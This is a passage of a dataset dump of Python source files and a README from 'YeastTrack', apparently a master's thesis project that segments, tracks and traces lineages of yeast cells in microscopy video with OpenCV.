"text": "import cv2\nfrom UserInterface.videoClass import Video\n\ndef loadChannels():\n filePathOpt = \"VideoData/tileScan2/tileScan2OptZ2.avi\"\n filePathFlo = \"VideoData/tileScan2/tileScan2Flo.avi\"\n\n filePathOpt = \"/home/klas/Documents/Chalmers/ExamensArbete/YeastTrack/VideoData/tileScan1/130419opt.avi\"\n filePathFlo = \"/home/klas/Documents/Chalmers/ExamensArbete/YeastTrack/VideoData/tileScan1/130419flo.avi\"\n\n filePathOpt = \"VideoData/Experiment13h_050619/vidP4C1Z4.avi\"\n filePathFlo = \"VideoData/Experiment13h_050619/vidP4C2Z2.avi\"\n\n #Get video Capture\n vidOpt = cv2.VideoCapture(filePathOpt)\n vidFlo = cv2.VideoCapture(filePathFlo)\n video = Video(vidOpt,vidFlo)\n return(video)\n"
},
{
"alpha_fraction": 0.6624365448951721,
"alphanum_fraction": 0.682741105556488,
"avg_line_length": 33.260868072509766,
"blob_id": "77311807e2db0034f56d3981a0a88b9cf8bfa908",
"content_id": "df05ed55098e368580a23a9b69e4168aaa2e4370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 788,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 23,
"path": "/Segmentation/ConvexHull.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\n#Pre: Binary image\n#Ret: ConvexHull Binary image\ndef convexHull(img):\n # Finding contours for the thresholded image\n contours, hierarchy = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n hull = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull.append(cv2.convexHull(contours[i], False))\n\n #Create an empty black image\n img = np.zeros((img.shape[0], img.shape[1]), np.uint8)\n\n for i in range(len(contours)):\n img = cv2.fillPoly(img, pts =[hull[i]], color=(255))\n\n return(img)\n"
},
{
"alpha_fraction": 0.7120075225830078,
"alphanum_fraction": 0.7223264575004578,
"avg_line_length": 26.33333396911621,
"blob_id": "d57a120f8b1c799c8cd793465091de88d7b700e5",
"content_id": "4cf81cf520f0e8a31525e96f7f908fa10957ed30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1066,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 39,
"path": "/UserInterface/UpdateFrame.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom UserInterface.IncreasIntesity import increasIntens\n\n\n#Update Frame Does scaling and adds all visual effect\n#Pre\n#Ret\ndef updateFrame(video,param):\n [currentFrame,currentBlend,showMaskImg,showCellID,showLinagesTree,showOptImg,showWHI5ActivImg] = param\n\n frame = video.getFrame(currentFrame)\n #optImg = frame.getScaledOptImage()\n optImg = frame.getUserOptImage()\n #floImg = frame.getScaledFloImage()\n floImg = frame.getUserFloImage()\n classImg = frame.getClassificationImage()\n finalImg = increasIntens(floImg,currentBlend)\n\n szX = finalImg.shape[0]\n szY = finalImg.shape[1]\n\n if showOptImg:\n finalImg = cv2.add(finalImg,optImg)\n if showMaskImg:\n finalImg = cv2.add(finalImg,classImg)\n if showCellID:\n finalImg = cv2.add(frame.getIDImage(),finalImg)\n if showWHI5ActivImg:\n finalImg = cv2.add(finalImg,frame.getWHI5ActivImage())\n\n cv2.imshow('CellTracker', finalImg)\n return()\n\n\n\ndef changeFrame(frameNum):\n global currentFrame\n currentFrame = frameNum\n updateFrame()\n"
},
{
"alpha_fraction": 0.6240988373756409,
"alphanum_fraction": 0.6529351472854614,
"avg_line_length": 33.67856979370117,
"blob_id": "ee0a790fe77b487569292a4017ba7ee49558ade4",
"content_id": "3d24fb2d0bef12c901a89dbb0bab2b16fabd01bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 971,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 28,
"path": "/Tracking/getEdgeToEdgeDist.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "def getSigmaEdegeToEdge(doughter,mother):\n distMD = getEdgeToEdgeDist(doughter,mother)\n #relatabelityFactor higher The closer the distance is to cellRadius\n slopeFactor = 1.3\n midPoint = 140\n sigmaDist = 1-1/(1+slopeFactor**(midPoint-distMD))\n return(sigmaDist)\n\ndef getEdgeToEdgeDist(doughter,mother):\n doughterDiscovFrame = doughter.getDetectionFrameNum()\n #Get Dist between cells att discovery moment\n dContour = doughter.getContour(pos = doughterDiscovFrame)\n mContour = mother.getContour(pos = doughterDiscovFrame)\n\n #Make Distance betven all points in countours\n\n minDist = float('inf')\n for pnt1 in dContour:\n pnt1 = pnt1[0]\n for pnt2 in mContour:\n pnt2 = pnt2[0]\n distPnts = (pnt1[0]-pnt2[0])**2\n distPnts = distPnts + (pnt1[1]-pnt2[1])**2\n distPnts = distPnts ** 0.5\n if(distPnts < float('inf')):\n minDist = distPnts\n\n return(minDist)\n"
},
{
"alpha_fraction": 0.7025464773178101,
"alphanum_fraction": 0.7298175692558289,
"avg_line_length": 33.39130401611328,
"blob_id": "8fc52a76c622fbaabd38ee067b8aa3ca8d794621",
"content_id": "f05ab201af13718e91d951232dd57de2670fd37f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5537,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 161,
"path": "/Tracking/findLineage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from scipy.spatial import distance as dist\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom Tracking.getEdgeToEdgeDist import getSigmaEdegeToEdge\n\ndef findLineage(trackedCells):\n\n for doughter in trackedCells:\n maxRelFactor = 0.0\n for mother in trackedCells:\n relFactor = getRelatabelityFactor(doughter,mother)\n if relFactor > maxRelFactor:\n maxRelFactor = relFactor\n doughter.setMotherCell(mother.getCellID(),relFactor)\n #anlyseRelatabelityFactor()\n\n#Pre: Two TrackedCell objects\n#Ret: number between 0 and 1 reflecting how likely they are to be related\ndef getRelatabelityFactor(doughter,mother):\n relatabelityFactor = -1\n\n doughterDetectFrame = doughter.getDetectionFrameNum()\n motherDetectFrame = mother.getDetectionFrameNum()\n\n #Number of frames must have exsisted befor being abale to be mother\n buddFrameNum = 10\n\n if motherDetectFrame+buddFrameNum > doughterDetectFrame:\n return(relatabelityFactor)\n\n if doughter.getCellID() == mother.getCellID():\n return(relatabelityFactor)\n\n #distFactorOLD = getDistFacorSigma(doughter,mother)\n distFactor = getSigmaEdegeToEdge(doughter,mother)\n\n whi5Factor = getWHI5Factor(doughter,mother)\n whi5Factor = 1\n #print(\"D: \" + str(doughter.getCellID()) + \" M: \" + str(mother.getCellID()))\n #print(\"distFactor: \" + str(distFactorNEW))\n #print(\"whi5Factor: \" + str(whi5Factor))\n\n distWeight = 1.5\n whi5Weight = 1\n relatabelityFactor = ((distFactor**distWeight)*(whi5Factor**whi5Weight))\n return(relatabelityFactor)\n\n\ndef getDistFacorSigma(doughter,mother):\n doughterDiscovFrame = doughter.getDetectionFrameNum()\n #Get Dist between cells att discovery moment\n (douX,douY) = doughter.getCentroid(doughterDiscovFrame)\n (motX,motY) = mother.getCentroid(doughterDiscovFrame)\n distMD = (douX-motX)*(douX-motX)\n distMD = distMD + (douY-motY)*(douY-motY)\n distMD = distMD ** 0.5\n #relatabelityFactor higher The closer the distance is to cellRadius\n slopeFactor = 1.3\n midPoint = 140\n sigmaDist = 1-1/(1+slopeFactor**(midPoint-distMD))\n return(sigmaDist)\n\n#Ret: portion of anlyse frames in which cell whi5 over threshold.\n#pre1: DoughterTrackedCell\n#pre2: MotherTrackdeCell\ndef getWHI5Factor(doughter,mother):\n analysisSpan = 50\n intensThreshold = 0.18\n binaryFactor = 0\n\n #Extract traces\n whi5Mother = mother.getWhi5Trace()\n\n doughterDetectFrame = doughter.getDetectionFrameNum()\n motherDetectFrame = mother.getDetectionFrameNum()\n\n #Take 50 elements after doughter cell have been detected.\n #If 50 elements are not availibal take elements to end.\n\n startMotherWhi5arr = motherDetectFrame-doughterDetectFrame\n\n if len(whi5Mother) < (startMotherWhi5arr+analysisSpan):\n whi5Mother = whi5Mother[startMotherWhi5arr:startMotherWhi5arr+analysisSpan]\n else:\n whi5Mother = whi5Mother[startMotherWhi5arr:-1]\n\n whi5Factor = 0\n for whi5 in whi5Mother:\n if(whi5 > intensThreshold):\n whi5Factor = whi5Factor + 1\n\n #Dont want to compleatly exclude the onece with 0 whi5\n baseConsidFactor = 0.1\n whi5Factor = max(whi5Factor/len(whi5Mother),0.1)\n print(whi5Factor)\n return(whi5Factor)\n\n\ndef findWHI5BothPeak(doughter,mother):\n analysisSpan = 50\n\n #Extract traces\n whi5Doughter = doughter.getWhi5Trace()\n whi5Mother = mother.getWhi5Trace()\n\n doughterDetectFrame = doughter.getDetectionFrameNum()\n motherDetectFrame = mother.getDetectionFrameNum()\n #Take 50 elements after doughter cell have been detected.\n #If 50 elements are not availibal take elements to end.\n if len(whi5Doughter) < analysisSpan:\n 
whi5Doughter = whi5Doughter[:analysisSpan]\n else:\n whi5Doughter = whi5Doughter[:-1]\n\n startMotherWhi5arr = motherDetectFrame-doughterDetectFrame\n\n if len(whi5Mother) < (startMotherWhi5arr+analysisSpan):\n whi5Mother = whi5Mother[startMotherWhi5arr:startMotherWhi5arr+analysisSpan]\n else:\n whi5Mother = whi5Mother[startMotherWhi5arr:-1]\n\n meanIntensDoughter = sum(whi5Doughter)/len(whi5Doughter)\n meanIntensMother = sum(whi5Mother)/len(whi5Mother)\n maxIntensDoughter = max(whi5Doughter)\n maxIntensMother = max(whi5Mother)\n\n bothPeakFactor = maxIntensDoughter*maxIntensMother\n\n return(bothPeakFactor)\n\ndef findWHI5Correlation(doughter,mother):\n analysisSpan = 50\n\n #Extract traces\n whi5Doughter = doughter.getWhi5Trace()\n whi5Mother = mother.getWhi5Trace()\n\n doughterDetectFrame = doughter.getDetectionFrameNum()\n motherDetectFrame = mother.getDetectionFrameNum()\n\n #Take 50 elements after doughter cell have been detected.\n #If 50 elements are not availibal take elements to end.\n if len(whi5Doughter) < analysisSpan:\n whi5Doughter = whi5Doughter[:analysisSpan]\n else:\n whi5Doughter = whi5Doughter[:-1]\n\n startMotherWhi5ardistFactorr = motherDetectFrame-doughterDetectFrame\n if len(whi5Mother) < (startMotherWhi5arr+analysisSpan):\n whi5Mother = whi5Mother[startMotherWhi5arr:startMotherWhi5arr+analysisSpan]\n else:\n whi5Mother = whi5Mother[startMotherWhi5arr:-1]\n\n #Check if same length else cut to shortest.\n if len(whi5Mother) < len(whi5Doughter):\n whi5Doughter = whi5Doughter[:len(whi5Mother)]\n if len(whi5Doughter) < len(whi5Mother):\n whi5Mother = whi5Mother[:len(whi5Doughter)]\n\n whi5correlation = np.correlate(whi5Mother,whi5Doughter)\n return(whi5correlation)\n"
},
{
"alpha_fraction": 0.7002187967300415,
"alphanum_fraction": 0.7308533787727356,
"avg_line_length": 28.483871459960938,
"blob_id": "d4dd8b0f3620506d1d9c45feda42afdceb6dcc8a",
"content_id": "653e08c1f2ed4a98e0f3ecffdbf268ca9d8d9c3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 914,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 31,
"path": "/Segmentation/Preprocessing.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from skimage.restoration import denoise_nl_means, estimate_sigma\nfrom skimage import exposure\nimport cv2\nimport numpy as np\n\n#Preprossesing of image using rescaling meanfiltering with sigma estimator and histogram equalization\n#Pre: image Raw\n#Ret: preprocessed image\ndef preprocess(img):\n #Rescaling\n #img = rescale_frame(img, percent=1000)\n #Decreasing noise\n img = cv2.fastNlMeansDenoising(img)\n #increasing contrast\n #img = cv2.equalizeHist(img)\n return(img)\n\ndef preprocessFloImg(img):\n img = cv2.fastNlMeansDenoising(img)\n #img = rescale_frame(img, percent=1000)\n return(img)\n\n#Rescale for optimal analysis size\n#Pre1: Image as numpy array\n#Pre2:\n#Ret:\ndef rescale_frame(image, percent=1000):\n width = int(image.shape[1] * percent/100)\n height = int(image.shape[0] * percent/100)\n dim = (width, height)\n return cv2.resize(image, dim, interpolation = cv2.INTER_AREA)\n"
},
{
"alpha_fraction": 0.6980067491531372,
"alphanum_fraction": 0.7314779758453369,
"avg_line_length": 31.036144256591797,
"blob_id": "ed64ffe8a973c1020b0caae8263c5220bf42413d",
"content_id": "2e5058da5308fc6ad57f7dd17e8eff15929d576f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2659,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 83,
"path": "/Segmentation/watershed.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nfrom Segmentation.cellInstance import cellInstance\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.FilterDetection import filterDetections\nfrom Segmentation.OstuBinarizartion import getMaskFrame\nfrom Segmentation.getThreshold import getTherholdImage\n#watershed\n#Pre: Frame As defined in main\n#Ret1: List of cellInstanses\ndef watershed(frame):\n openingThres = 25\n\n optFrame = frame.getScaledOptChan()\n floFrame = frame.getScaledFloChan()\n\n gray = cv2.cvtColor(floFrame,cv2.COLOR_BGR2GRAY)\n\n #Thresolding\n #ret, thresh = cv2.threshold(gray,openingThres,255,cv2.THRESH_BINARY)\n thresh = getTherholdImage(frame)\n\n # noise removal\n kernel = np.ones((3,3),np.uint8)\n opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n opening = cv2.cvtColor(opening, cv2.COLOR_BGR2GRAY)\n # sure background area\n sureBG = cv2.dilate(opening,kernel,iterations=3)\n\n # Finding sure foreground area\n #opening = np.uint8(opening)\n #opening = cv2.convertTo(opening, CV_8UC1);\n\n distTransform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\n ret, sureFG = cv2.threshold(distTransform,0.65*distTransform.max(),255,0)\n\n #Finding unknown region\n sureFG = np.uint8(sureFG)\n unknown = cv2.subtract(sureBG,sureFG)\n\n #Marker labelling\n ret, markers = cv2.connectedComponents(sureFG)\n\n markers = markers+1\n\n #Finding unknown region\n sureFG = np.uint8(sureFG)\n unknown = cv2.subtract(sureBG,sureFG)\n\n #Mark unknown region with 0\n markers[unknown==255] = 0\n\n markers = cv2.watershed(floFrame,markers)\n #markers = cv2.watershed(distTransform,markers)\n\n floFrame[markers == -1] = [0,0,255]\n\n markersShow = np.array(markers, dtype=np.uint8)\n\n markersShow = cv2.cvtColor(markersShow, cv2.COLOR_GRAY2BGR)\n markersShow[markers == -1] = [255,255,255]\n markersShow = cv2.add(markersShow,floFrame)\n cv2.imshow(\"markers\",markersShow)\n cv2.waitKey(0)\n cellInstanses = conectedCompontents(markersShow,floFrame)\n cellInstanses = filterDetections(cellInstanses)\n #print(cellInstanses)\n return(cellInstanses)\n\ndef conectedCompontents(frame,floFrame):\n #Frame to CV_8UC1\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY);\n #gray = frame\n conectedCompontents, hirearchy = cv2.findContours(gray, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n\n cellInstanses = []\n for cnt in conectedCompontents:\n whi5Activ = getWHI5Activity(cnt,floFrame)\n cellInstans = cellInstance(cnt,whi5Activ)\n cellInstanses.append(cellInstans)\n\n return(cellInstanses)\n"
},
{
"alpha_fraction": 0.6392405033111572,
"alphanum_fraction": 0.7041139006614685,
"avg_line_length": 34.11111068725586,
"blob_id": "eb01da0fdbddc60a4ef2930be43eac59c8a3c698",
"content_id": "de26939d4ffa4fe59e65ce0501444159efda7bcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 632,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 18,
"path": "/UserInterface/getInstantSegmentImage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom UserInterface.getMaskImage import getMaskImage\n\n#color all the blobs with individual colors\n#Text size for all cells\ndef getCellInstImage(listOfCellInstances,sizeX,sizeY):\n colorSet = [(0,7,100),(32,107,203),(237, 120, 255),(255, 170,0),(100,2,100)]\n\n drawing = np.zeros((sizeX,sizeY, 3), np.uint8)\n\n for cellInstances in listOfCellInstances:\n cnt = cellInstances.getContour()\n convexHull = cv2.convexHull(cnt, False)\n col = colorSet[trackedCell.getCellID() % len(colorSet)]\n drawing = cv2.fillPoly(drawing, pts =[convexHull], color=col)\n\n return(drawing)\n"
},
{
"alpha_fraction": 0.7641723155975342,
"alphanum_fraction": 0.7653061151504517,
"avg_line_length": 29.413793563842773,
"blob_id": "79d19631edf426ae8d14fba768df79ddafebeee0",
"content_id": "14c530ecdb9fbd1bd011b474544c8abdebce36ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 882,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 29,
"path": "/Segmentation/RandomForestSegmentaion.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from Segmentation.ParmeterizeImagegs import imagesToPrameter\nimport pickle\nimport cv2\nfrom matplotlib import pyplot as plt\nfrom Segmentation.ConectedComponents import conectedCompontents\nfrom Segmentation.FilterDetection import filterDetections\n\n#Pre: Frame\n#Ret: CellInstances in that frame\ndef rfSegmentetion(Frame):\n optImg = Frame.getOptImage()\n floImg = Frame.getFloImage()\n\n #Make Images To Parameters\n parm = imagesToPrameter(optImg,floImg)\n #Load Random Forest model\n rfModel = pickle.load(open(\"Segmentation/YeastCellRFModel\", 'rb'))\n\n #Predic Segemt With Model\n result = rfModel.predict(parm)\n result = result.reshape((optImg.shape))\n\n #Grow Erode?? \n\n #Use Conected Components\n cellInstances = conectedCompontents(result,floImg)\n cellInstances = filterDetections(cellInstances)\n #Return Cell instance\n return(cellInstances)\n"
},
{
"alpha_fraction": 0.6524032950401306,
"alphanum_fraction": 0.6828839182853699,
"avg_line_length": 34.54166793823242,
"blob_id": "0b74b284dbe39f11aac24b427044c8bfe5c9e952",
"content_id": "5dd07dbd71aa452fdb1aa45276bec5582e05cdab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1706,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 48,
"path": "/UserInterface/getMaskImage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\n#Pre: VideoFrame\n#Ret: White on black maskFrame\ndef getMaskImage(frame):\n frame = otsuThreshold(frame)\n maskFrame = convexHull(frame)\n return(maskFrame)\n\ndef otsuThreshold(frame):\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n #apply thresholding\n gotFrame, thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n return(thresh)\n\n#Pre: takes An image Black and white\n#Ret: Returns Image with conexHull filled of all wite separated images\ndef convexHull(frame):\n # Finding contours for the thresholded image\n\n contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n hull = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull.append(cv2.convexHull(contours[i], False))\n\n # create an empty black image\n drawing = np.zeros((frame.shape[0], frame.shape[1], 3), np.uint8)\n\n # draw contours and hull points\n for i in range(len(contours)):\n color_contours = (0, 255, 0) # green - color for contours\n color = (255, 0, 0) # blue - color for convex hull\n # draw ith contour\n cv2.drawContours(drawing, contours, i, color_contours, 1, 8, hierarchy)\n # draw ith convex hull object\n cv2.drawContours(drawing, hull, i, color, 1, 8)\n\n for i in range(len(contours)):\n drawing = cv2.fillPoly(drawing, pts =[hull[i]], color=(255,255,255))\n\n return(drawing)\n #cv2.imshow(\"ConvexHull\",drawing)\n #cv2.waitKey(0)\n"
},
{
"alpha_fraction": 0.6657534241676331,
"alphanum_fraction": 0.6657534241676331,
"avg_line_length": 51,
"blob_id": "007688859d5512537e8ae666b588e6ec1b0349eb",
"content_id": "2427e99546058104b399c38df6075e847f12fa9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 7,
"path": "/Analysis/PrintMotherDoughter.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "\ndef printMotherDoghuther(trackedCells):\n for trackedCell in trackedCells:\n doughterID = trackedCell.getCellID()\n motgherID = trackedCell.getMotherCell()\n relatabelityFactor = trackedCell.getRelatabelityFactor()\n print(\"M: \" + str(motgherID) + \" --> \" + \"D: \" + str(doughterID))\n print(\"RelFactor: \" + str(relatabelityFactor))\n"
},
{
"alpha_fraction": 0.5702410936355591,
"alphanum_fraction": 0.6209476590156555,
"avg_line_length": 25.15217399597168,
"blob_id": "587974ceff3697d46b71e494aab41c417fd76e3c",
"content_id": "525a7dd51f0050916c11efecf7d56b7fe71ab191",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1203,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 46,
"path": "/Analysis/FitExponential.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport scipy.optimize as op\nfrom matplotlib import pyplot as plt\n\ndef func(x,const,rate):\n return(const*np.exp(rate*x))\n\ndef fitExponential(array):\n print(len(array))\n fx = np.array(range(len(array)))\n fy = np.array(array)\n\n popt, pcov = op.curve_fit(func,fx,fy,p0=(fx[0], 0.1),maxfev = 6000)\n\n plt.plot(fx, fy, 'x', label='data')\n plt.plot(fx, func(fx, *popt), label='curve-fit')\n plt.legend(loc='upper left')\n\n return(popt)\n\n\n#Put in epo in size plot\ndef plotDataWithExpo(array):\n xArr = range(0,31)\n const = 5.3338403*1000\n rate = 2.1211569/100\n yArr = []\n for i in range(len(xArr)):\n yArr.append(func(i,const,rate))\n plt.plot(xArr, yArr,color='C1',label=\"exponential fit\")\n\n const = 8.493409*1000\n rate = 5.3318/1000\n xArr = range(36,95)\n yArr = []\n for i in range(len(xArr)):\n yArr.append(func(i,const,rate))\n plt.plot(xArr, yArr,color='C2',label=\"exponential fit\")\n plt.plot(range(len(array)), array,'x',color='C0',label= \"data\")\n plt.ylabel('Growth Curves with exponential fit')\n plt.xlabel('Time')\n plt.title(\"Size\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n"
},
{
"alpha_fraction": 0.6095238327980042,
"alphanum_fraction": 0.644444465637207,
"avg_line_length": 27.636363983154297,
"blob_id": "8d3e51a5cda09d0df2e85bfd68f624d5c47d0b9c",
"content_id": "c393b41ea69624f3f3bef08e579f6ef58a6d53b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 11,
"path": "/Analysis/getDevisionFrameNum.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "#Returnsfirst Whi5 activation Index\ndef getDevisionFrameNum(doughter):\n thresh = 0.30\n cellWhi5Trace = doughter.getWhi5Trace()\n index = 0\n for whi5 in cellWhi5Trace:\n index = index + 1\n if whi5 > thresh:\n index = index+doughter.getDetectionFrameNum()\n \n return(index)\n"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.7765957713127136,
"avg_line_length": 15.412698745727539,
"blob_id": "a461a0f0c7ce424a739fa4811c6d6d9122f36b80",
"content_id": "2060a246ba5f03ebd5fb65d317b7961bd95aa63d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1034,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 63,
"path": "/README.md",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "# Yeast Track\n\nMaster Thesis Work. Tracking Yeast.\n\n### Prerequisites\n\nThis Project Was created using Python 3.6.9 and OpenCV\n\nDependencies can be intalled using pip.\nFor image analysis.\npip3 install opencv-python\nFor Graph ploting.\npip3 install networkx\n\nAlso For loading .lif files the Bioformats Command Line Tools is needed.\nCan be dowloaded at https://downloads.openmicroscopy.org/bio-formats/6.5.0/artifacts/bftools.zip\n\n## Install\n\ninstall python:\nEx: sudo apt install python\n\nInstal Pacakge Manger:\nEx: sudo apt install python3-pip\n\nInstall Requierments:\npip install requierments.txt\n\n## Running\n\nCode Can be run in python\n\nPython3 main.py\n\nThis loads the program with the file specified in loadData.py\n\n## Controlls\n\nOnce the program is running the program can be controled by hitting following buttons.\n\nq = quit\n\ns = Show Segmentation\n\no = show Opt Chan\n\ni = show cell ID\n\nw = show WHI5 Activ Threshold\n\nl = Print Lineage\n\np = Plot Data.\n\n\n## TODO\n\nUserInterface\nSegmentation\nTracking\nLoad Data\nCroping alternative\nTesting\n"
},
{
"alpha_fraction": 0.6639118194580078,
"alphanum_fraction": 0.7203856706619263,
"avg_line_length": 33.57143020629883,
"blob_id": "19942d747379e8840409409ddc4a1e0cd5b9be84",
"content_id": "f928463f7020dbfa9bee94acf9a6e84f81022761",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 726,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 21,
"path": "/UserInterface/getClassImage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom UserInterface.getMaskImage import getMaskImage\nfrom UserInterface.rescaleImageToUser import rescaleImageToUser\n\n#color all the blobs with individual colors\n#Text size for all cells\ndef getClassImage(listOfObjects,sizeX,sizeY):\n colorSet = [(0,7,100),(32,107,203),(237, 120, 255),(255, 170,0),(100,2,100)]\n\n classImg = np.zeros((sizeX,sizeY, 3), np.uint8)\n\n for trackedCell in listOfObjects:\n cnt = trackedCell.getContour()\n convexHull = cv2.convexHull(cnt, False)\n col = colorSet[trackedCell.getCellID() % len(colorSet)]\n classImg = cv2.fillPoly(classImg, pts =[convexHull], color=col)\n\n classImg = rescaleImageToUser(classImg)\n\n return(classImg)\n"
},
{
"alpha_fraction": 0.659745454788208,
"alphanum_fraction": 0.7026121616363525,
"avg_line_length": 32.931819915771484,
"blob_id": "0c69a2db4f3a7b245a185ac7d5b54a69d426198c",
"content_id": "c69754ce33ec139bb9d13db5899e791d6bf24b8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1493,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 44,
"path": "/Segmentation/getWHI5Activity.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\n#Pre1: Keypoint All cells\n#Pre2: Mask Frame With cells\n#Pre3: Florecent Chanell\n#Ret: Array with numberes corresponding to WHI5 Activity\ndef getWHI5ActivityNorm(countour, floChan):\n #convexHull = cv2.ConvexHull2(countour,orientation=CV_CLOCKWISE, return_points=0)\n convexHull = cv2.convexHull(countour, False)\n\n drawing = np.zeros((floChan.shape[0], floChan.shape[1], 1), np.uint8)\n\n drawing = cv2.fillPoly(drawing, pts =[convexHull], color=(255))\n\n #Take intesection floChan and convexHull\n mask_out = cv2.subtract(drawing,floChan)\n\n mask_out = cv2.subtract(drawing,mask_out)\n whi5Activ = cv2.sumElems(mask_out)\n\n moments = cv2.moments(countour)\n area = moments['m00']\n whi5Activ = whi5Activ[1]/area/255\n return(whi5Activ)\n\ndef getWHI5Activity(countour, floChan):\n #convexHull = cv2.ConvexHull2(countour,orientation=CV_CLOCKWISE, return_points=0)\n convexHull = cv2.convexHull(countour, False)\n\n drawing = np.zeros((floChan.shape[0], floChan.shape[1], 1), np.uint8)\n\n drawing = cv2.fillPoly(drawing, pts =[convexHull], color=(255))\n\n #print(\"Got gray in get getWHI5Activity\")\n drawing = np.zeros((floChan.shape[0], floChan.shape[1], 1), np.uint8)\n drawing = cv2.fillPoly(drawing, pts =[convexHull], color=(255))\n mask_out=cv2.subtract(drawing,floChan)\n\n mask_out=cv2.subtract(drawing,mask_out)\n #cv2.imshow(\"mask \",mask_out)\n #cv2.waitKey(0)\n whi5Activ = mask_out[...].max()/255\n return(whi5Activ)\n"
},
{
"alpha_fraction": 0.7591836452484131,
"alphanum_fraction": 0.777550995349884,
"avg_line_length": 39.83333206176758,
"blob_id": "fdd3a15e818233aa98bc8fb523f73ac0cba2da30",
"content_id": "ef2a2e5a2f206b88dd88fdab23918e4a787660e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 490,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 12,
"path": "/Segmentation/ConectedComponents.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
